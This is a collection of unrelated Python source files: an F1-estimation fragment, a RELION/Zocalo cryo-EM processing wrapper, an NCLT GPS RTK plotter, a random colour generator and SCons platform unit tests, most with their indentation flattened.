weights * (0.5 * y_pred[rand_rows] + 0.5 * y_test[rand_rows]),
)
measurements.append([prec, rec, f1])
stds.append([prec_trialstd, rec_trialstd, f1_trialstd])
# Update current best estimate of F1
if not math.isnan(f1):
g = 0.5 * g + 0.5 * f1
measurement_weights.append([prec_den, rec_den, f1_den])
all_rand_rows = np.unique(np.concatenate(all_rand_rows))
measurements = np.asarray(measurements)
stds = np.asarray(stds)
measurement_weights = np.array(measurement_weights) + 0.0001
# Keep only the results from the last 'k_keep' iterations of the algorithm
if k_keep > 0: # Set to -1 to deactivate
measurements = measurements[-k_keep:]
stds = stds[-k_keep:]
measurement_weights = measurement_weights[-k_keep:]
# Compute a weighted average of the estimates of F-Score computed across the
# last 'k_keep' iterations
avg_measurements = np.zeros(3)
avg_stds = np.zeros(3)
for k in range(3):
indices = ~np.isnan(measurements[:, k])
if indices.sum() > 0:
normalized_weights = measurement_weights[:, k][indices]
normalized_weights /= np.sum(normalized_weights)
avg_measurements[k] = np.average(
measurements[:, k][indices], weights=measurement_weights[:, k][indices]
)
avg_stds[k] = np.sqrt(
np.sum((stds[:, k][indices] * normalized_weights) ** 2)
)
else:
avg_measurements[k] = math.nan
avg_stds[k] = math.nan
avg_budget = len(all_rand_rows)
return np.array(avg_measurements), np.array(avg_stds), np.array(avg_budget)
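# Illustrative end-to-end sketch (added for clarity, not part of the original
# file): estimating precision/recall/F1 for a noisy synthetic classifier with a
# small labeling budget.  All data below is randomly generated for the example,
# so the returned values will vary from run to run.
def _example_ais_fullalgorithm(seed=0):
    rng = np.random.RandomState(seed)
    k = 2000
    y_test = (rng.rand(k) < 0.1).astype(int)                        # rare positive class
    prob_pos = np.clip(0.4 * y_test + 0.6 * rng.rand(k), 0.0, 1.0)  # noisy model scores
    y_pred = (prob_pos > 0.5).astype(int)
    prf1, stds, budget = ais_fullalgorithm(y_pred, y_test, prob_pos, sample_budget=300)
    # prf1 holds (precision, recall, F1) estimates, stds their standard
    # deviations, and budget the number of labels actually consumed.
    return prf1, stds, budget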
|
the-stack_0_25190
|
import datetime
import enum
import functools
import logging
import os
import pathlib
import threading
import time
from pprint import pprint
from typing import Union
import zocalo.util.symlink
import zocalo.wrapper
import relion
from relion.cryolo_relion_it import cryolo_relion_it, dls_options, icebreaker_histogram
from relion.cryolo_relion_it.cryolo_relion_it import RelionItOptions
from relion.dbmodel.modeltables import (
CryoemInitialModelTable,
CTFTable,
MotionCorrectionTable,
ParticleClassificationGroupTable,
ParticleClassificationTable,
ParticlePickerTable,
RelativeIceThicknessTable,
)
logger = logging.getLogger("relion.zocalo.wrapper")
RelionStatus = enum.Enum("RelionStatus", "RUNNING SUCCESS FAILURE")
# to test:
# - create an empty directory
# - run the following command to generate a recipe-wrapper:
# dlstbx.find_in_ispyb -p 6844019 -f /dls_sw/apps/zocalo/live/recipes/ispyb-relion.json --recipe-pointer=2 --out=rw && replace "/dls/m12/data/2021/cm28212-1/processed" "$(pwd)/processed" "/dls/m12/data/2021/cm28212-1/tmp" "$(pwd)/tmp" '"$ispyb_autoprocprogram_id"' "83862530" < rw > rw-local
# - run the wrapper:
# dlstbx.wrap --recipewrapper=rw-local --wrap=relion --offline -v
class RelionWrapper(zocalo.wrapper.BaseWrapper):
def run(self):
# Enable log messages for relion.*
logging.getLogger("relion").setLevel(logging.INFO)
# Report python-relion package version
self.status_thread.set_static_status_field("python-relion", relion.__version__)
assert hasattr(self, "recwrap"), "No recipewrapper object found"
self.params = self.recwrap.recipe_step["job_parameters"]
self.working_directory = pathlib.Path(self.params["working_directory"])
self.results_directory = pathlib.Path(self.params["results_directory"])
# Here we cheat. Ultimately we want to run the processing inside the
# 'working' directory, and then copy relevant output into the 'results'
# directory as we go along. In the first instance we will just run Relion
# inside the 'results' directory, and ignore the 'working' directory
# completely.
self.working_directory = self.results_directory
# Create working and results directory
self.working_directory.mkdir(parents=True, exist_ok=True)
self.results_directory.mkdir(parents=True, exist_ok=True)
if self.params.get("create_symlink"):
# Create symbolic link above directories
# We want users to go to the most recent execution, as they can stop
# and restart processing from SynchWeb. Thus we overwrite symlinks.
zocalo.util.symlink.create_parent_symlink(
self.working_directory,
self.params["create_symlink"],
overwrite_symlink=True,
)
zocalo.util.symlink.create_parent_symlink(
self.results_directory,
self.params["create_symlink"],
overwrite_symlink=True,
)
# Relion needs to have a 'Movies' link inside the working directory
# pointing to the image files
movielink = "Movies"
os.symlink(self.params["image_directory"], self.working_directory / movielink)
self.params["ispyb_parameters"]["import_images"] = os.path.join(
movielink,
pathlib.Path(self.params["ispyb_parameters"]["import_images"]).relative_to(
self.params["image_directory"]
),
)
# Debug output
pprint(self.params)
# Select specific Cryolo version if so desired
if self.params.get("cryolo_version"):
os.environ["CRYOLO_VERSION"] = self.params["cryolo_version"]
logger.info("Selected cryolo version %s", self.params["cryolo_version"])
# Initialise number of imported files to 0
imported_files = []
mc_job_time_all_processed = None
for k, v in self.params["ispyb_parameters"].items():
if v.isnumeric():
self.params["ispyb_parameters"][k] = int(v)
elif v.lower() == "true":
self.params["ispyb_parameters"][k] = True
elif v.lower() == "false":
self.params["ispyb_parameters"][k] = False
else:
try:
self.params["ispyb_parameters"][k] = float(v)
except ValueError:
pass
if self.params["ispyb_parameters"]["import_images"].endswith(".eer"):
self.params["ispyb_parameters"]["motioncor_do_own"] = True
pprint(self.params["ispyb_parameters"])
self.opts = RelionItOptions()
self.opts.update_from(vars(dls_options))
self.opts.update_from(self.params["ispyb_parameters"])
# Start Relion
self._relion_subthread = threading.Thread(
target=self.start_relion, name="relion_subprocess_runner", daemon=True
)
self._relion_subthread.start()
relion_started = time.time()
preprocess_check = self.results_directory / "RUNNING_PIPELINER_PREPROCESS"
all_process_check = self.results_directory / "RUNNING_RELION_IT"
relion_prj = relion.Project(
self.working_directory,
run_options=self.opts,
message_constructors={
"ispyb": construct_message,
"images": images_msgs,
"images_particles": images_particles_msgs,
},
)
while not relion_prj.origin_present() or not preprocess_check.is_file():
time.sleep(0.5)
if time.time() - relion_started > 10 * 60:
break
relion_prj.load()
preproc_recently_run = False
processing_ended = False
should_send_icebreaker = True
icebreaker_particles_star_file_found = False
while (
self._relion_subthread.is_alive() or preprocess_check.is_file()
) and False not in [n.environment["status"] for n in relion_prj if n._out]:
time.sleep(1)
# logger.info("Looking for results")
ispyb_command_list = []
images_command_list = []
images_particles_command_list = []
if pathlib.Path(self.params["stop_file"]).is_file():
relion_prj.load()
for job_path in relion_prj._job_nodes:
(
self.results_directory
/ job_path.name
/ "RELION_JOB_EXIT_ABORTED"
).touch()
for p in self.results_directory.glob("RUNNING_*"):
p.unlink()
relion_prj.load()
# Should only return results that have not previously been sent
# for fr in relion_prj.results.fresh:
# curr_res = ispyb_results(fr.stage_object, fr.job_name, self.opts)
# ispyb_command_list.extend(curr_res)
# images_command_list.extend(images_msgs(fr.stage_object, fr.job_name))
# if curr_res:
# logger.info(f"Fresh results found for {fr.job_name}")
# if ispyb_command_list:
# logger.info(
# "Sending commands like this: %s", str(ispyb_command_list[0])
# )
# self.recwrap.send_to(
# "ispyb", {"ispyb_command_list": ispyb_command_list}
# )
# logger.info("Sent %d commands to ISPyB", len(ispyb_command_list))
# Should only return results that have not previously been sent
for job_msg in relion_prj.messages:
if job_msg.get("ispyb") and job_msg["ispyb"]:
logger.info(
f"Found results that look like this: {job_msg['ispyb'][0]}"
)
ispyb_command_list.extend(job_msg["ispyb"])
if job_msg.get("images") and job_msg["images"]:
images_command_list.extend(job_msg["images"])
if job_msg.get("images_particles") and job_msg["images_particles"]:
images_particles_command_list.extend(job_msg["images_particles"])
if ispyb_command_list:
# split up multi-part ISPyB messages into chunks of 200 to reduce load on the message broker
multipart_limit = 200
num_msgs = len(ispyb_command_list) // multipart_limit
if len(ispyb_command_list) % multipart_limit:
num_msgs += 1
for imsg in range(num_msgs):
if imsg == num_msgs - 1:
this_msg = ispyb_command_list[multipart_limit * imsg :]
else:
this_msg = ispyb_command_list[
multipart_limit * imsg : multipart_limit * (imsg + 1)
]
logger.info("Sending commands like this: %s", str(this_msg[0]))
self.recwrap.send_to("ispyb", {"ispyb_command_list": this_msg})
logger.info("Sent %d commands to ISPyB", len(this_msg))
for imgcmd in images_command_list:
if imgcmd:
self.recwrap.send_to("images", imgcmd)
for imgcmd in images_particles_command_list:
if imgcmd:
imgcmd.update(
{
"angpix": self.opts.angpix,
"diameter": self.opts.mask_diameter,
}
)
self.recwrap.send_to("images_particles", imgcmd)
### Extract and send Icebreaker results as histograms if the Icebreaker grouping job has run
if not self.opts.stop_after_ctf_estimation and (
self.opts.do_class2d or self.opts.do_class3d
):
attachment_list = []
try:
pdf_file_path = icebreaker_histogram.create_pdf_histogram(
self.working_directory
)
json_file_path = icebreaker_histogram.create_json_histogram(
self.working_directory
)
if should_send_icebreaker and pdf_file_path and json_file_path:
attachment_list.append(
ispyb_attachment(json_file_path, "Graph")
)
attachment_list.append(ispyb_attachment(pdf_file_path, "Graph"))
logger.info(f"Sending ISPyB attachments {attachment_list}")
self.recwrap.send_to(
"ispyb", {"ispyb_command_list": attachment_list}
)
should_send_icebreaker = False
icebreaker_particles_star_file_found = True
except (FileNotFoundError, OSError, RuntimeError, ValueError):
logger.error("Error creating Icebreaker histogram.")
# if Relion has been running too long stop loop of preprocessing jobs
try:
most_recent_movie = max(
p.stat().st_mtime
for p in pathlib.Path(self.params["image_directory"]).glob("**/*")
)
# if a file vanishes for some reason make sure that there is no crash and no exit
except FileNotFoundError:
most_recent_movie = time.time()
# check if all imported files have been motion corrected
# if they have then get the time stamp of the motion correction job
# so that it can be checked all preprocessing jobs have run after it
# only do this if the number of imported files has changed
new_imported_files = relion_prj.get_imported()
if new_imported_files != imported_files or not mc_job_time_all_processed:
imported_files = new_imported_files
mc_job_time_all_processed = self.check_processing_of_imports(
relion_prj, imported_files
)
if len(relion_prj._job_nodes) != 0 and len(relion_prj.preprocess) != 0:
for job in relion_prj.preprocess:
job_end_time = job.environment["end_time_stamp"]
if job_end_time is None:
break
if (
datetime.datetime.timestamp(job_end_time) < most_recent_movie
or job.environment["job_count"] < 1
):
break
# don't need to check if Import job has run recently for this bit
if mc_job_time_all_processed and "Import" not in job.name:
if (
datetime.datetime.timestamp(job_end_time)
< mc_job_time_all_processed
):
preproc_recently_run = False
break
else:
preproc_recently_run = True
currtime = time.time()
if (
currtime - most_recent_movie
> int(self.params["latest_movie_timeout"]) * 60
and currtime - relion_started > 10 * 60
and preprocess_check.is_file()
and preproc_recently_run
and mc_job_time_all_processed
):
logger.info(
f"Ending preprocessing: current time {currtime}, most recent movie {most_recent_movie}, time at which all micrographs were processed {mc_job_time_all_processed}"
)
preprocess_check.unlink()
processing_ended = self.check_whether_ended(relion_prj)
if (
currtime - most_recent_movie
> int(self.params["latest_movie_timeout"]) * 60
and currtime - relion_started > 10 * 60
and all_process_check.is_file()
and processing_ended
and mc_job_time_all_processed
):
logger.info(
f"Ending all processing: current time {currtime}, most recent movie {most_recent_movie}"
)
all_process_check.unlink()
if not icebreaker_particles_star_file_found:
logger.warning("No particles.star file found for Icebreaker grouping.")
logger.info("Done.")
success = False not in [n.environment["status"] for n in relion_prj if n._out]
if preprocess_check.is_file():
preprocess_check.unlink()
if all_process_check.is_file():
all_process_check.unlink()
return success
@staticmethod
def check_processing_of_imports(relion_prj, imported):
try:
checked_key = "job002"
checks = [False for _ in range(len(imported))]
for i, f in enumerate(imported):
keys = [
(j.environment["job"], j)
for j in relion_prj._jobtype_nodes
if j.name == "MotionCorr"
]
for key, job in keys:
if any(
f.split(".")[0] in p.micrograph_name.split(".")[0]
for p in job.environment["result"][key]
):
checks[i] = True
checked_key = key
break
if all(checks):
completion_time = relion_prj._job_nodes.get_by_name(
"MotionCorr/" + checked_key
).environment["end_time_stamp"]
if completion_time:
return datetime.datetime.timestamp(completion_time)
return
except (KeyError, AttributeError, RuntimeError, FileNotFoundError) as e:
logger.debug(
f"Exception encountered while checking whether imported files have been processed: {e}",
exc_info=True,
)
return
def start_relion(self):
print("Running RELION wrapper - stdout")
logger.info("Running RELION wrapper - logger.info")
# Write options to disk for a record of parameters used
options_file = self.working_directory / cryolo_relion_it.OPTIONS_FILE
logger.info(f"Writing all options to {options_file}")
if os.path.isfile(options_file):
logger.info(
f"File {options_file} already exists; renaming old copy to {options_file}~"
)
os.rename(options_file, f"{options_file}~")
with open(options_file, "w") as optfile:
self.opts.print_options(optfile)
success = False
oldpwd = os.getcwd()
try:
os.chdir(self.working_directory)
cryolo_relion_it.run_pipeline(self.opts)
success = True
except Exception as ex:
logger.error(ex)
finally:
os.chdir(oldpwd)
logger.info("Done.")
return success
def check_whether_ended(self, proj):
if len(proj._job_nodes) == 0 or None in [j.environment["status"] for j in proj]:
return False
check_time = time.time()
return all(
check_time - datetime.datetime.timestamp(j.environment["end_time_stamp"])
> 10 * 60
for j in proj
)
def create_synchweb_stop_file(self):
pathlib.Path(self.params["stop_file"]).touch()
def get_status(self, job_path):
relion_stop_files = [
"RELION_JOB_EXIT_SUCCESS",
"RELION_EXIT_FAILURE",
"RELION_JOB_ABORT_NOW",
"RELION_EXIT_ABORTED",
]
# synchweb_stop_files = [synchweb stop files list]
# job_finished_files = [relion job finished files]
        for item in relion_stop_files:
            if (job_path / item).is_file():  # or synchweb_stop_file exists:
                return RelionStatus.SUCCESS
        return RelionStatus.RUNNING
# if job_finished_file exists:
@functools.singledispatch
def images_msgs(table, primary_key, **kwargs):
return []
@images_msgs.register(MotionCorrectionTable)
def _(table: MotionCorrectionTable, primary_key: int, **kwargs):
return {
"file": table.get_row_by_primary_key(primary_key)[
"micrograph_snapshot_full_path"
].replace(".jpeg", ".mrc")
}
@images_msgs.register(CTFTable)
def _(table: CTFTable, primary_key: int, **kwargs):
return {
"file": table.get_row_by_primary_key(primary_key)[
"fft_theoretical_full_path"
].replace(".jpeg", ".ctf")
}
@images_msgs.register(ParticleClassificationGroupTable)
def _(table: ParticleClassificationGroupTable, primary_key: int, **kwargs):
image_path = table.get_row_by_primary_key(primary_key)["class_images_stack"]
if not image_path:
return {}
return {"file": image_path, "all_frames": "true"}
@functools.singledispatch
def images_particles_msgs(table, primary_key, **kwargs):
return []
@images_particles_msgs.register(ParticlePickerTable)
def _(table: ParticlePickerTable, primary_key: int, **kwargs):
mc_image_path = table.get_row_by_primary_key(primary_key)[
"mc_image_full_path"
].replace(".jpeg", ".mrc")
parpick_image_path = table.get_row_by_primary_key(primary_key)[
"summary_image_full_path"
]
if not mc_image_path or not parpick_image_path:
return {}
coords = table.get_row_by_primary_key(primary_key)["particle_coordinates"]
return {"file": mc_image_path, "outfile": parpick_image_path, "coordinates": coords}
@functools.singledispatch
def construct_message(table, primary_key, resend=False, unsent_appended=None):
raise ValueError(f"{table!r} is not a known Table")
@construct_message.register(MotionCorrectionTable)
def _(
table: MotionCorrectionTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
drift_data = row["drift_data"]
buffered = ["motion_correction_id", "drift_data"]
buffer_store = row["motion_correction_id"]
drift_frames = [(frame.frame, frame.deltaX, frame.deltaY) for frame in drift_data]
results = {
"ispyb_command": "buffer",
"buffer_command": {
"ispyb_command": "insert_motion_correction",
**{k: v for k, v in row.items() if k not in buffered},
"drift_frames": drift_frames,
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(CTFTable)
def _(
table: CTFTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = ["motion_correction_id", "ctf_id"]
buffer_store = row["ctf_id"]
buffer_lookup = row["motion_correction_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
"ctf_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_ctf",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_ctf",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(ParticlePickerTable)
def _(
table: ParticlePickerTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = [
"first_motion_correction_id",
"particle_picker_id",
"particle_coordinates",
]
buffer_store = row["particle_picker_id"]
buffer_lookup = row["first_motion_correction_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
"particle_picker_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_particle_picker",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_particle_picker",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(ParticleClassificationGroupTable)
def _(
table: ParticleClassificationGroupTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = ["particle_picker_id", "particle_classification_group_id"]
buffer_store = row["particle_classification_group_id"]
buffer_lookup = row["particle_picker_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_picker_id": buffer_lookup,
"particle_classification_group_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_particle_classification_group",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_picker_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_particle_classification_group",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(ParticleClassificationTable)
def _(
table: ParticleClassificationTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = ["particle_classification_group_id", "particle_classification_id"]
buffer_store = row["particle_classification_id"]
buffer_lookup = row["particle_classification_group_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_classification_group_id": buffer_lookup,
"particle_classification_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_particle_classification",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_classification_group_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_particle_classification",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
@construct_message.register(CryoemInitialModelTable)
def _(
table: CryoemInitialModelTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
if unsent_appended is None:
unsent_appended = {}
row = table.get_row_by_primary_key(primary_key)
class_ids = unsent_appended.get("particle_classification_id", [])
# class_ids = row["particle_classification_id"]
buffer_store = row["cryoem_initial_model_id"]
if not isinstance(class_ids, list):
class_ids = [class_ids]
results = []
if resend:
for i, class_id in enumerate(class_ids):
buffered = ["particle_classification_id", "cryoem_initial_model_id"]
this_result = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_classification_id": class_id,
"cryoem_initial_model_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_cryoem_initial_model",
**{k: v for k, v in row.items() if k not in buffered},
},
}
results.append(this_result)
else:
for i, class_id in enumerate(class_ids):
buffered = ["particle_classification_id", "cryoem_initial_model_id"]
this_result = {
"ispyb_command": "buffer",
"buffer_lookup": {
"particle_classification_id": class_id,
},
"buffer_command": {
"ispyb_command": "insert_cryoem_initial_model",
**{k: v for k, v in row.items() if k not in buffered},
},
}
if i == 0:
this_result["buffer_store"] = buffer_store
else:
this_result["buffer_lookup"]["cryoem_initial_model_id"] = buffer_store
results.append(this_result)
return results
@construct_message.register(RelativeIceThicknessTable)
def _(
table: RelativeIceThicknessTable,
primary_key: int,
resend: bool = False,
unsent_appended: Union[dict, None] = None,
):
row = table.get_row_by_primary_key(primary_key)
buffered = ["motion_correction_id", "relative_ice_thickness_id"]
buffer_store = row["relative_ice_thickness_id"]
buffer_lookup = row["motion_correction_id"]
if resend:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
"relative_ice_thickness_id": buffer_store,
},
"buffer_command": {
"ispyb_command": "insert_relative_ice_thickness",
**{k: v for k, v in row.items() if k not in buffered},
},
}
else:
results = {
"ispyb_command": "buffer",
"buffer_lookup": {
"motion_correction_id": buffer_lookup,
},
"buffer_command": {
"ispyb_command": "insert_relative_ice_thickness",
**{k: v for k, v in row.items() if k not in buffered},
},
"buffer_store": buffer_store,
}
return results
def ispyb_attachment(attachment_path_object, file_type):
return {
"ispyb_command": "add_program_attachment",
"file_name": os.fspath(attachment_path_object.name),
"file_path": os.fspath(attachment_path_object.parent),
"file_type": file_type,
}
|
the-stack_0_25191
|
import math
import numpy as np
import matplotlib.pyplot as plt
from nclt2ros.visualizer.plotter import Plotter
from nclt2ros.transformer.coordinate_frame import CoordinateFrame
class GPS_RTK(Plotter):
"""Class to visualize the GPS RTK data as a kml and png file
USAGE:
GPS_RTK(date='2013-01-10', output_file='gps_rtk', plt_show=True)
"""
def __init__(self, date, output_file='gps_rtk', plt_show=True):
if isinstance(output_file, str):
self.output_file = output_file
else:
raise TypeError("'output_file' must be type of string")
self.date = date
self.plt_show = plt_show
# init base class
Plotter.__init__(self, date=self.date)
# transform coordinate frame into 'odom' or 'gt'
if self.date == '2013-01-10':
self.gps_rtk_converter = CoordinateFrame(origin='odom')
else:
self.gps_rtk_converter = CoordinateFrame(origin='gt')
# load data
self.gps_rtk = self.reader.read_gps_rtk_csv(all_in_one=True)
def save_kml_line(self):
"""visualize the gps rtk data as a kml file
"""
lat = self.gps_rtk[:, 3]
lng = self.gps_rtk[:, 4]
gps_rtk_list = list()
for (i_lat, j_lng) in zip(lat, lng):
if not math.isnan(i_lat) and not math.isnan(j_lng):
tup = (np.rad2deg(j_lng), np.rad2deg(i_lat)) # swap and convert lat long to deg
gps_rtk_list.append(tup)
ls = self.kml.newlinestring(name="gps rtk", coords=gps_rtk_list, description="latitude and longitude from gps rtk")
ls.style.linestyle.width = 1
ls.style.linestyle.color = self.red
self.kml.save(self.visualization_kml_dir + self.output_file + '.kml')
def get_gps_rtk_data(self):
"""get gps rtk data for visualization
:return: list for x coordinates, list for y coordinates
"""
lat = self.gps_rtk[:, 3]
lng = self.gps_rtk[:, 4]
x_list = list()
y_list = list()
for (i_lat, j_lng) in zip(lat, lng):
if not math.isnan(i_lat) and not math.isnan(j_lng):
x = self.gps_rtk_converter.get_x(lat=np.rad2deg(i_lat))
y = self.gps_rtk_converter.get_y(lon=np.rad2deg(j_lng))
x_list.append(x)
y_list.append(y)
return x_list, y_list
def save_gps_rtk_png(self):
"""visualize the gps rtk data as a png file
"""
x_list, y_list = self.get_gps_rtk_data()
plt.plot(y_list, x_list, 'r-', label='gps rtk')
plt.title('GPS RTK')
plt.xlabel('x in meter')
plt.ylabel('y in meter')
plt.legend(loc='upper left')
plt.grid()
plt.savefig(self.visualization_png_gps_rtk_dir + 'gps_rtk.png')
if self.plt_show:
plt.show()
def get_png_gps_rtk_dir(self):
"""get the png gps rtk directory
:return: path to png gps rtk directory
"""
return self.visualization_png_gps_rtk_dir
if __name__ == '__main__':
gps = GPS_RTK(date='2012-01-08')
gps.save_gps_rtk_png()
|
the-stack_0_25193
|
import random
LIST_COLORS = []
def remove_color(doppelganger):
if doppelganger in LIST_COLORS:
LIST_COLORS.remove(doppelganger)
def hex_code_colors():
    # Keep sampling until a new, valid colour is produced.  (With the previous
    # `while z not in LIST_COLORS` condition, hitting a duplicate made the loop
    # exit and the function silently return None.)
    while True:
a = hex(random.randrange(0,256))
b = hex(random.randrange(0,256))
c = hex(random.randrange(0,256))
a = a[2:]
b = b[2:]
c = c[2:]
if len(a)<2:
a = "0" + a
if len(b)<2:
b = "0" + b
if len(c)<2:
c = "0" + c
x = a + b + c
z = "#" + x
if z in LIST_COLORS:
continue
if z == "#000000" or z == "#FFFFFF":
continue
LIST_COLORS.append(z)
return z
def generateRandomColor(r, g, b):
    red = random.randint(0, 255)
    green = random.randint(0, 255)
    blue = random.randint(0, 255)
    # Blend with the supplied base colour; compare against None so that a
    # component value of 0 still counts as provided.
    if r is not None and g is not None and b is not None:
red = int((red + r) / 2)
green = int((green + g) / 2)
blue = int((blue + b) / 2)
LIST_COLORS.append('#%02x%02x%02x' % (red, green, blue))
return '#%02x%02x%02x' % (red, green, blue)
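# Illustrative usage sketch (added for clarity, not part of the original file):
# drawing a handful of distinct colours and one colour averaged towards pure red.
def _example_colors():
    palette = [hex_code_colors() for _ in range(5)]   # five unique "#rrggbb" strings
    tinted = generateRandomColor(255, 0, 0)           # random colour blended with red
    return palette, tinted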
|
the-stack_0_25194
|
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import collections
import unittest
import os
import SCons.compat
import SCons.Errors
import SCons.Platform
import SCons.Environment
import SCons.Action
class Environment(collections.UserDict):
def Detect(self, cmd):
return cmd
def AppendENVPath(self, key, value):
pass
class PlatformTestCase(unittest.TestCase):
def test_Platform(self):
"""Test the Platform() function"""
p = SCons.Platform.Platform('cygwin')
assert str(p) == 'cygwin', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '.exe', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('os2')
assert str(p) == 'os2', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '.exe', env
assert env['LIBSUFFIX'] == '.lib', env
p = SCons.Platform.Platform('posix')
assert str(p) == 'posix', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('irix')
assert str(p) == 'irix', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('aix')
assert str(p) == 'aix', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('sunos')
assert str(p) == 'sunos', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('hpux')
assert str(p) == 'hpux', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '', env
assert env['LIBSUFFIX'] == '.a', env
assert env['SHELL'] == 'sh', env
p = SCons.Platform.Platform('win32')
assert str(p) == 'win32', p
env = Environment()
p(env)
assert env['PROGSUFFIX'] == '.exe', env
assert env['LIBSUFFIX'] == '.lib', env
exc_caught = None
try:
p = SCons.Platform.Platform('_does_not_exist_')
except SCons.Errors.UserError:
exc_caught = 1
assert exc_caught, "did not catch expected UserError"
env = Environment()
SCons.Platform.Platform()(env)
assert env != {}, env
class TempFileMungeTestCase(unittest.TestCase):
def test_MAXLINELENGTH(self):
""" Test different values for MAXLINELENGTH with the same
size command string to ensure that the temp file mechanism
kicks in only at MAXLINELENGTH+1, or higher
"""
# Init class with cmd, such that the fully expanded
# string reads "a test command line".
# Note, how we're using a command string here that is
# actually longer than the substituted one. This is to ensure
# that the TempFileMunge class internally really takes the
# length of the expanded string into account.
defined_cmd = "a $VERY $OVERSIMPLIFIED line"
t = SCons.Platform.TempFileMunge(defined_cmd)
env = SCons.Environment.SubstitutionEnvironment(tools=[])
# Setting the line length high enough...
env['MAXLINELENGTH'] = 1024
env['VERY'] = 'test'
env['OVERSIMPLIFIED'] = 'command'
expanded_cmd = env.subst(defined_cmd)
# Call the tempfile munger
cmd = t(None, None, env, 0)
assert cmd == defined_cmd, cmd
# Let MAXLINELENGTH equal the string's length
env['MAXLINELENGTH'] = len(expanded_cmd)
cmd = t(None, None, env, 0)
assert cmd == defined_cmd, cmd
# Finally, let the actual tempfile mechanism kick in
# Disable printing of actions...
old_actions = SCons.Action.print_actions
SCons.Action.print_actions = 0
env['MAXLINELENGTH'] = len(expanded_cmd)-1
cmd = t(None, None, env, 0)
# ...and restoring its setting.
SCons.Action.print_actions = old_actions
assert cmd != defined_cmd, cmd
def test_TEMPFILEARGJOINBYTE(self):
"""
Test argument join byte TEMPFILEARGJOINBYTE
"""
# Init class with cmd, such that the fully expanded
# string reads "a test command line".
# Note, how we're using a command string here that is
# actually longer than the substituted one. This is to ensure
# that the TempFileMunge class internally really takes the
# length of the expanded string into account.
defined_cmd = "a $VERY $OVERSIMPLIFIED line"
